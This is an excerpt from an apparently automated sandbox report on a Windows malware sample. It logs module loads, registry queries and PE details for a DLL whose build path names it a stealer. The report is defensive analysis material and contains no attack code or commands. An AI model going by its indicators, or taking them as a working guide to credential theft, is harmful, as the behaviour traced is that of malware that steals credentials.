    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: cred64.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: cred64.dll.dllStatic file information: File size 1281024 > 1048576
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: cred64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1355416212.000002C91CA5D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .pdbpdblib.pdb}k source: powershell.exe, 00000016.00000002.1568675841.00000191CB620000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *on.pdbVu+ source: powershell.exe, 00000016.00000002.1570208304.00000191CB850000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lambda_methodb.pdb source: powershell.exe, 0000000E.00000002.1356517077.000002C91E9BC000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1f source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbA- source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000016.00000002.1573769341.00000191CB97E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: scorlib.pdb source: powershell.exe, 00000016.00000002.1568675841.00000191CB620000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbtti source: powershell.exe, 0000000E.00000002.1472153187.000002C936BF1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbllH source: powershell.exe, 0000000E.00000002.1472153187.000002C936BF1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.1570208304.00000191CB850000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.dll
    Source: Binary string: rlib.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: cred64.dll.dllStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFC700BD pushad ; iretd 14_2_00007FF7BFC700C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFC79A10 push ds; iretd 14_2_00007FF7BFC79A11
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFD480ED pushad ; retf 14_2_00007FF7BFD48111
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFD47570 pushad ; iretd 14_2_00007FF7BFD47571
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFD4B31B push eax; ret 14_2_00007FF7BFD4B551
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFD4C2E4 pushfd ; retn 0000h14_2_00007FF7BFD4C2E5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7BFD4C2E0 pushfd ; retn 0000h14_2_00007FF7BFD4C2E1

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
